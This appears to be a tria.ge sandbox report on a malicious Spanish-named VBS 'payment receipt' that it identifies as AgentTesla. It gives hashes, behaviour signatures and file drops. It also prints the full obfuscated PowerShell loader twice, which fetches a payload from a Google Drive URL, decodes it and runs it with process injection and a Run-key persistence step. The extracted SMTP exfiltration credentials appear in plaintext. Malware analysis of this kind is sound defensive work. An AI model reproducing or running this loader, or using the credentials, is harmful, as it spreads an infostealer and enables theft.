Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240215-es -
resource tags
-
submitted
15/04/2024, 09:06
General
-
Target
JUSTIFICANTE DE PAGO.vbs
-
Size
210KB
-
MD5
5c629502f5f297b1473c1288daef4815
-
SHA1
c1339b52ef4f18e1bc269d928bbf85387d17b3e4
-
SHA256
f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d
-
SHA512
e4f7951973b8a19231acd3afca20ea0a4dc479d039cef2a5634cacefad9261006bfbea7288d444725cfb7e8e5aa9f33891779d68fa393fe0b60404b7a6664ec2
-
SSDEEP
6144:iYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfcqNZ:X2dOtzRn
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.cash4cars.nz - Port:
587 - Username:
[email protected] - Password:
logs2024! - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE DE PAGO.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Virksomhedskundes = 1;$Urfolks='Substrin';$Urfolks+='g';Function Mediaevalize($Lejen){$Kvintetten=$Lejen.Length-$Virksomhedskundes;For($Lapperiet=5; $Lapperiet -lt $Kvintetten; $Lapperiet+=(6)){$Electrizable+=$Lejen.$Urfolks.Invoke($Lapperiet, $Virksomhedskundes);}$Electrizable;}function Bryllupsgaven($Patosens){& ($Lutz) ($Patosens);}$Cater=Mediaevalize 'AcetoM.verioRedimzJ,rrai Ribal Nerol Ki,haForsa/ Drib5 Anam.Mult 0 Bver deno(TrafiWT rbaiRude nSotoldArabio E.edwT.lexs Balk VirkeN .verTErhve hyste1Unboh0 .isi. Unco0 ,bdi;Bovls blaffW ilociAmorfn Velo6forbu4Tilsa;Natur Basswx Bagh6S,ocr4Linje; Trag Gynecr Exciv.crat:Balli1Tagal2Konto1 Li,t. Kuwa0Demar)R.spe DeliGListeeMachic Havrkacetoo Dis /,tpar2Sh,pw0Const1Juste0Fastp0Pishi1u.kld0Skryd1U,cia AlainFSend iKursvrDroite Selsf VandoS bylxMisaw/Rad o1Servi2Dunst1Pas,e. Dute0P rqu ';$Pldere=Mediaevalize ' IndkUWedelsUs,rme,owdyrLarin-ReechAUnsangBelgne KitcnPassatudfrl ';$Prajer=Mediaevalize 'Rest,h IndstPolemtWycl p TablsSwowe: Svrd/ Tekk/psykidNemalr Carui Jallv WarseMater.AkkorgOc looArthroDurangGladil,etrieChe.r.SkytscBengtoaltrumomd,e/UnderuM.nopcr,der?GenneeK ravxForrapsysteoTemadrBuccit Klag= Su,kd paahoLegatwFletfnHjemglA.ernoSkirlaPagandAdopt&SterniSlovad Sand=Mdere1Edibiremendf.erryXC oppsAarh.O DissSBeerbCP.ychaKotwa4trykfYRhythpKnal p wan,cUnifolAlkovEin.coICrepibgi.thKMange6Forsoenotocudisg,RK.desuMaxil_AdmeaH Phys2 Hype0HvalfP .yredVerifJUdsulHStude7 Be.o ';$Synchondrosially=Mediaevalize 'Swin.>Excog ';$Lutz=Mediaevalize 'Indogi ,alaeMyeloxPa.se ';$Tilvejebringes = Mediaevalize 'CollaeDisancMaskihSjipnoCicer Needl%Anoina iskep WorkpVandmdUgesta Par,tStregaRu.tn% For.\ GardMCeropiAnt.rl MacroGabonsAd,es.HvoribEt,anlBent,aBodyl Noiso&Go se& xyha Tosk,e Antic ellhRapidoInd.r Termi$Krost ';Bryllupsgaven (Mediaevalize 'Posr $ByrthgTet,rl Sndeo,fstnbWa seaBr avl.arri:GolfeBCottaeDerivs Kon,kCar oi Malfn SnifnRevele BrottTrons=Forsk(BardecJyskhmkaj.adPilot Frerp/ VuggcOnera Archb$PelseTAlgoriDidyml Ki kvGa cheSkovrjFrs,ee.ebleb Akkur aaskiUnsolnOverigDy,klec slusExcu,)be.or ');Bryllupsgaven (Mediaevalize 'F ren$IntrogSmudslDiantoUnlifbfifleaKnighlBlueb:Te,tiFCamphlQurshadol.as EftekLecane Udsup stejo ,ostsUnreatOveraeKrognnTris,=I,dte$SlovePskru,rLimuaa.laahjCharteImmunr Obla. FolksWaganpE pepl.ewaki absotTekst(Ind,a$UnsquS FostypolygnProfic.lecthra,ulotonednSpadedForhar ,ereoAutocssangsiKap laEfterlStop lTabley Marg)Filan ');$Prajer=$Flaskeposten[0];Bryllupsgaven (Mediaevalize 'Kul l$Arke g ThealImau.oWholibbedeaa Empul Spie:IntroSFo.eseVasoemT.dlnbclotul,ugeneMu,ti=AgripNSkru e H zew Tog,-G telOregiobspdbrjFylkee,ucofc RometDo.ns SkattSR paryDamsps.ogtrt RadeeConqumOttar.YelpeNBisameMargitUdfal.T.rteWIndkoeBalsab SolfCI.dfllKa.teiTo.vie StaknVarmetAfgre ');Bryllupsgaven (Mediaevalize ' Ad i$FrateSAs.rieHauntmFiskebCalablSonnee King.op prHLnproe,pflaaForgodElevpeIncharHringsEjend[Sphen$PolitPPignolKicksd Frere MegarWhorreKondu] Misr=Forre$,ultiCAlphoaUnivetLoftseForskrBrode ');$Diftongeringen=Mediaevalize 'VigtiS.lndeeBequemKlem.bUn,lulMinueebrudf.Haf.iDH,epsoSkyhowB.shbnAngrelBrkdeoUnctiaF,brodRegtaF ,onki.drtslRutebe.egne( ord$PleurP Hvisr BeauaSt vejGrapheKraftrRetsp,Direk$BenfrUra conSto ks ,lseu DatabDrgtimSm syiHin,isToutes StudiOm osvAcroseContr)Revap ';$Diftongeringen=$Beskinnet[1]+$Diftongeringen;$Unsubmissive=$Beskinnet[0];Bryllupsgaven (Mediaevalize ' Stra$FormigGuvaclMeet o OverbAffunaUterol Clor:HabilG Oranls.lehuneweleE,ceim.fsviaandennD.oni= Fa e(selskTPervae ,istsLi.oxtMusic-Fo giP Rec aVirk,tOrienhInfor S.st$KommaUN.zilnMonitsPseudu VoldbA.omimRelatiTeksts.cintsOve giretf.vMuseuePyrop)Nauti ');while (!$Glueman) {Bryllupsgaven (Mediaevalize 'Ni,ro$UdskrgFunktlNonmyoorlo bPaynia Co nlPreim:BetalFWindrlStandiRad.umForamf.idnelsydsla SubomSenge=Helge$,etaltGer,nr PhyluSubmied sha ') ;Bryllupsgaven $Diftongeringen;Bryllupsgaven (Mediaevalize ' StanSIllittHukbaa .talrTavletOverd-EnantSabe,alOverfe.istre NedrpZon s Who e4 Wast ');Bryllupsgaven (Mediaevalize 'Va.df$ Babog Su.plTrsk.o Fav.bNonthaAnti,lPreed:ThiosG AndelAdstiu nreeOutstm elgra,aplonParce= Rveh(Bin.eTStic e.amsisNonaftCompa-TonekP,ivalaGra.itAcrolhPre.n Blady$ OptrUAbc,rnAns,asSenoruFo,edb Medhm.ootliUhyresAf.visRemiliCotenv Fr.te,hris) Svej ') ;Bryllupsgaven (Mediaevalize 'Macka$Kem.lgHusholU.skro KnudbafledaSkol l Bas,:OblatHNabobeSkovvnConcuvBilleiEspals Li mnPresciComplnAflgggTidsbeAntidrWhingnlooseeSvrmesPlaty=Armb.$ErythgPros lDom no P ngbSkuffa Perilm,cro:Dec.aS Haa mProfiiStylosSouthk.ektoe,ammedC,gnaeFranksRadio+Skilr+Logco%b nef$ nmerFbespolHjlpeaDriv.sErgsvkHreapeClimapeks.mo Earts FaldtBronzeTurkinIna c.Bajerc Skalo .vovuDoemtnKompltexcur ') ;$Prajer=$Flaskeposten[$Henvisningernes];}Bryllupsgaven (Mediaevalize 'Liman$.ompegSudanlHomoloImmatbAce aaPoly,lMezzo:NglepPSvagslBagh.aNomadnSulphiPr grmVrdimeSeleftSubsirBrandeLlin.sSorte P epl=Param G.ewtGLevereDemoktRabbi- MeteCUncifoSkaernAf.lat R,gieTetran,ldertsoile .arth$displURensenBibl.sAntanu WantbChlormanoasiAfslasPinwhs ExtriSttevvStilleRed,i ');Bryllupsgaven (Mediaevalize ' Ph y$Plexig Podsl TankoweathbPeri,aD,sillA par:AttriMkulmoyMartirAscidr metaaLaw.es.nalc Prote= Mayo Recip[ Afl,SCajonyGeorgsNonchtDemiue PrivmB,ntm.LumbaC elgeoN.dgrn R hnv.domeeDrgforCandltBruge]Molek:douve:wytedFIrre.rKaffeoMunnomU solBSlumma Ludds R ete,entr6Desig4 BarySIsohetKon,lrSaldaiEtiken ImpagV,ole(Statu$ P asPPledglAstriaVolubn ondiiS,ragm,olsjeOutbutStererStatse FiltsIn er)Opsen ');Bryllupsgaven (Mediaevalize 'Try k$NikkegSalvelGenioo Ka.kbInkluaRockelO.dde:CottoESupernListeuScattnCanoncValveiF,rgia utatFly,eiNico.oPromen ArthsAnima Under=Endem Forli[Str cSeleveyBlaass D.rit IniteCastemDeval.Fi skTEkspae,enyaxDishet Komp.UraneEDesegnHerlacBancao F.ngdSelskiUncapn UdsigGtef,]Cent.: Stal:,enziA SlurSUnposC RetiIRe geI Ungd.GaveaGUdsmueTidsttRigsvSLeishtGratirAbiotiSturnnPseu,gBrint( Glas$DecriMPhysiymilier .arvrSyphoaEmetisLiv.r)Dimer ');Bryllupsgaven (Mediaevalize 'Subid$Caverg ShowlP dopoUnguabbimilaVra,gl Patt:TilnrOBombepModt.vIconoaFrem,rPuppemSmitsnf.letiPortanK ntagSte fs nfor=Egenk$,riceESvi,gnReoriuFuglenElastcKannei lotsaObsc,tAnglii boreoCylinnSacchs Stif.S retsHus,luApprobfid.ssHobbytSmaabrPseu,iH,ndrnUnibigA reg(Hercu2Torpi9Isoan1L.vte0risfu4Ridde1Sammm,Term 2Print8Pendu8 Fris2P.aty4D.ift) .nab ');Bryllupsgaven $Opvarmnings;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Milos.bla && echo $"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Virksomhedskundes = 1;$Urfolks='Substrin';$Urfolks+='g';Function Mediaevalize($Lejen){$Kvintetten=$Lejen.Length-$Virksomhedskundes;For($Lapperiet=5; $Lapperiet -lt $Kvintetten; $Lapperiet+=(6)){$Electrizable+=$Lejen.$Urfolks.Invoke($Lapperiet, $Virksomhedskundes);}$Electrizable;}function Bryllupsgaven($Patosens){& ($Lutz) ($Patosens);}$Cater=Mediaevalize 'AcetoM.verioRedimzJ,rrai Ribal Nerol Ki,haForsa/ Drib5 Anam.Mult 0 Bver deno(TrafiWT rbaiRude nSotoldArabio E.edwT.lexs Balk VirkeN .verTErhve hyste1Unboh0 .isi. Unco0 ,bdi;Bovls blaffW ilociAmorfn Velo6forbu4Tilsa;Natur Basswx Bagh6S,ocr4Linje; Trag Gynecr Exciv.crat:Balli1Tagal2Konto1 Li,t. Kuwa0Demar)R.spe DeliGListeeMachic Havrkacetoo Dis /,tpar2Sh,pw0Const1Juste0Fastp0Pishi1u.kld0Skryd1U,cia AlainFSend iKursvrDroite Selsf VandoS bylxMisaw/Rad o1Servi2Dunst1Pas,e. Dute0P rqu ';$Pldere=Mediaevalize ' IndkUWedelsUs,rme,owdyrLarin-ReechAUnsangBelgne KitcnPassatudfrl ';$Prajer=Mediaevalize 'Rest,h IndstPolemtWycl p TablsSwowe: Svrd/ Tekk/psykidNemalr Carui Jallv WarseMater.AkkorgOc looArthroDurangGladil,etrieChe.r.SkytscBengtoaltrumomd,e/UnderuM.nopcr,der?GenneeK ravxForrapsysteoTemadrBuccit Klag= Su,kd paahoLegatwFletfnHjemglA.ernoSkirlaPagandAdopt&SterniSlovad Sand=Mdere1Edibiremendf.erryXC oppsAarh.O DissSBeerbCP.ychaKotwa4trykfYRhythpKnal p wan,cUnifolAlkovEin.coICrepibgi.thKMange6Forsoenotocudisg,RK.desuMaxil_AdmeaH Phys2 Hype0HvalfP .yredVerifJUdsulHStude7 Be.o ';$Synchondrosially=Mediaevalize 'Swin.>Excog ';$Lutz=Mediaevalize 'Indogi ,alaeMyeloxPa.se ';$Tilvejebringes = Mediaevalize 'CollaeDisancMaskihSjipnoCicer Needl%Anoina iskep WorkpVandmdUgesta Par,tStregaRu.tn% For.\ GardMCeropiAnt.rl MacroGabonsAd,es.HvoribEt,anlBent,aBodyl Noiso&Go se& xyha Tosk,e Antic ellhRapidoInd.r Termi$Krost ';Bryllupsgaven (Mediaevalize 'Posr $ByrthgTet,rl Sndeo,fstnbWa seaBr avl.arri:GolfeBCottaeDerivs Kon,kCar oi Malfn SnifnRevele BrottTrons=Forsk(BardecJyskhmkaj.adPilot Frerp/ VuggcOnera Archb$PelseTAlgoriDidyml Ki kvGa cheSkovrjFrs,ee.ebleb Akkur aaskiUnsolnOverigDy,klec slusExcu,)be.or ');Bryllupsgaven (Mediaevalize 'F ren$IntrogSmudslDiantoUnlifbfifleaKnighlBlueb:Te,tiFCamphlQurshadol.as EftekLecane Udsup stejo ,ostsUnreatOveraeKrognnTris,=I,dte$SlovePskru,rLimuaa.laahjCharteImmunr Obla. FolksWaganpE pepl.ewaki absotTekst(Ind,a$UnsquS FostypolygnProfic.lecthra,ulotonednSpadedForhar ,ereoAutocssangsiKap laEfterlStop lTabley Marg)Filan ');$Prajer=$Flaskeposten[0];Bryllupsgaven (Mediaevalize 'Kul l$Arke g ThealImau.oWholibbedeaa Empul Spie:IntroSFo.eseVasoemT.dlnbclotul,ugeneMu,ti=AgripNSkru e H zew Tog,-G telOregiobspdbrjFylkee,ucofc RometDo.ns SkattSR paryDamsps.ogtrt RadeeConqumOttar.YelpeNBisameMargitUdfal.T.rteWIndkoeBalsab SolfCI.dfllKa.teiTo.vie StaknVarmetAfgre ');Bryllupsgaven (Mediaevalize ' Ad i$FrateSAs.rieHauntmFiskebCalablSonnee King.op prHLnproe,pflaaForgodElevpeIncharHringsEjend[Sphen$PolitPPignolKicksd Frere MegarWhorreKondu] Misr=Forre$,ultiCAlphoaUnivetLoftseForskrBrode ');$Diftongeringen=Mediaevalize 'VigtiS.lndeeBequemKlem.bUn,lulMinueebrudf.Haf.iDH,epsoSkyhowB.shbnAngrelBrkdeoUnctiaF,brodRegtaF ,onki.drtslRutebe.egne( ord$PleurP Hvisr BeauaSt vejGrapheKraftrRetsp,Direk$BenfrUra conSto ks ,lseu DatabDrgtimSm syiHin,isToutes StudiOm osvAcroseContr)Revap ';$Diftongeringen=$Beskinnet[1]+$Diftongeringen;$Unsubmissive=$Beskinnet[0];Bryllupsgaven (Mediaevalize ' Stra$FormigGuvaclMeet o OverbAffunaUterol Clor:HabilG Oranls.lehuneweleE,ceim.fsviaandennD.oni= Fa e(selskTPervae ,istsLi.oxtMusic-Fo giP Rec aVirk,tOrienhInfor S.st$KommaUN.zilnMonitsPseudu VoldbA.omimRelatiTeksts.cintsOve giretf.vMuseuePyrop)Nauti ');while (!$Glueman) {Bryllupsgaven (Mediaevalize 'Ni,ro$UdskrgFunktlNonmyoorlo bPaynia Co nlPreim:BetalFWindrlStandiRad.umForamf.idnelsydsla SubomSenge=Helge$,etaltGer,nr PhyluSubmied sha ') ;Bryllupsgaven $Diftongeringen;Bryllupsgaven (Mediaevalize ' StanSIllittHukbaa .talrTavletOverd-EnantSabe,alOverfe.istre NedrpZon s Who e4 Wast ');Bryllupsgaven (Mediaevalize 'Va.df$ Babog Su.plTrsk.o Fav.bNonthaAnti,lPreed:ThiosG AndelAdstiu nreeOutstm elgra,aplonParce= Rveh(Bin.eTStic e.amsisNonaftCompa-TonekP,ivalaGra.itAcrolhPre.n Blady$ OptrUAbc,rnAns,asSenoruFo,edb Medhm.ootliUhyresAf.visRemiliCotenv Fr.te,hris) Svej ') ;Bryllupsgaven (Mediaevalize 'Macka$Kem.lgHusholU.skro KnudbafledaSkol l Bas,:OblatHNabobeSkovvnConcuvBilleiEspals Li mnPresciComplnAflgggTidsbeAntidrWhingnlooseeSvrmesPlaty=Armb.$ErythgPros lDom no P ngbSkuffa Perilm,cro:Dec.aS Haa mProfiiStylosSouthk.ektoe,ammedC,gnaeFranksRadio+Skilr+Logco%b nef$ nmerFbespolHjlpeaDriv.sErgsvkHreapeClimapeks.mo Earts FaldtBronzeTurkinIna c.Bajerc Skalo .vovuDoemtnKompltexcur ') ;$Prajer=$Flaskeposten[$Henvisningernes];}Bryllupsgaven (Mediaevalize 'Liman$.ompegSudanlHomoloImmatbAce aaPoly,lMezzo:NglepPSvagslBagh.aNomadnSulphiPr grmVrdimeSeleftSubsirBrandeLlin.sSorte P epl=Param G.ewtGLevereDemoktRabbi- MeteCUncifoSkaernAf.lat R,gieTetran,ldertsoile .arth$displURensenBibl.sAntanu WantbChlormanoasiAfslasPinwhs ExtriSttevvStilleRed,i ');Bryllupsgaven (Mediaevalize ' Ph y$Plexig Podsl TankoweathbPeri,aD,sillA par:AttriMkulmoyMartirAscidr metaaLaw.es.nalc Prote= Mayo Recip[ Afl,SCajonyGeorgsNonchtDemiue PrivmB,ntm.LumbaC elgeoN.dgrn R hnv.domeeDrgforCandltBruge]Molek:douve:wytedFIrre.rKaffeoMunnomU solBSlumma Ludds R ete,entr6Desig4 BarySIsohetKon,lrSaldaiEtiken ImpagV,ole(Statu$ P asPPledglAstriaVolubn ondiiS,ragm,olsjeOutbutStererStatse FiltsIn er)Opsen ');Bryllupsgaven (Mediaevalize 'Try k$NikkegSalvelGenioo Ka.kbInkluaRockelO.dde:CottoESupernListeuScattnCanoncValveiF,rgia utatFly,eiNico.oPromen ArthsAnima Under=Endem Forli[Str cSeleveyBlaass D.rit IniteCastemDeval.Fi skTEkspae,enyaxDishet Komp.UraneEDesegnHerlacBancao F.ngdSelskiUncapn UdsigGtef,]Cent.: Stal:,enziA SlurSUnposC RetiIRe geI Ungd.GaveaGUdsmueTidsttRigsvSLeishtGratirAbiotiSturnnPseu,gBrint( Glas$DecriMPhysiymilier .arvrSyphoaEmetisLiv.r)Dimer ');Bryllupsgaven (Mediaevalize 'Subid$Caverg ShowlP dopoUnguabbimilaVra,gl Patt:TilnrOBombepModt.vIconoaFrem,rPuppemSmitsnf.letiPortanK ntagSte fs nfor=Egenk$,riceESvi,gnReoriuFuglenElastcKannei lotsaObsc,tAnglii boreoCylinnSacchs Stif.S retsHus,luApprobfid.ssHobbytSmaabrPseu,iH,ndrnUnibigA reg(Hercu2Torpi9Isoan1L.vte0risfu4Ridde1Sammm,Term 2Print8Pendu8 Fris2P.aty4D.ift) .nab ');Bryllupsgaven $Opvarmnings;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Milos.bla && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
344B
MD54dd4bfdfc938ac7aed87a9c2ecfc9f3d
SHA1db4eea8f421a66bb40711b6fb2c4f37ac7270c44
SHA2564500995a97c41d11f0f727885b0393868eb5b4ec0299d3504ca9c0f5f332f2ce
SHA512fb0ccf0c8c82970ef1e12ce6911941d8cde39396fee0bf642d87cb9b96444bc302b7703cb59148525ede665f41cdaf07a05b98a61e93d1981731a6aaaec0ccda
-
Filesize
7KB
MD5d49381eec8b98465d083140ae08ace52
SHA1820d94fd5f559f89b8d9358f684361eb0fbe8b46
SHA256126b0088b20357046b018f8c52c9c698a538c3e704a22d4964db6359680cf6e4
SHA512886c77bac337dedae47737b9d1ac9900830371a617616a6e7060a5f08de504f8d01204027f409580d65465232cf2bc773f4c60dab3002c6d028b102fe66fbe6d
-
Filesize
416KB
MD5bab8170aca54ef2fe9a90366eaa17fff
SHA132b3d928772882fa0ac8b86f54b1e916ead2741d
SHA2567494e8bd3b34644c8b99db3f1241af973c272823abf8d6e092f8e82532106a96
SHA512c84366d4da84bb89637df585d75169e94c2061a6275e8bc79e54114febd07e88dc1561c51db54afdeeea0143a2dd1eaef2abe00c88a17bbed506501a620aa59c
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
40KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
56KB
-
Filesize
312KB
-
Filesize
280KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
4KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
856KB
-
Filesize
82.9MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
16.4MB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
16.4MB
-
Filesize
856KB
-
Filesize
264KB
-
Filesize
6.9MB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
1.7MB
-
Filesize
6.9MB
-
Filesize
256KB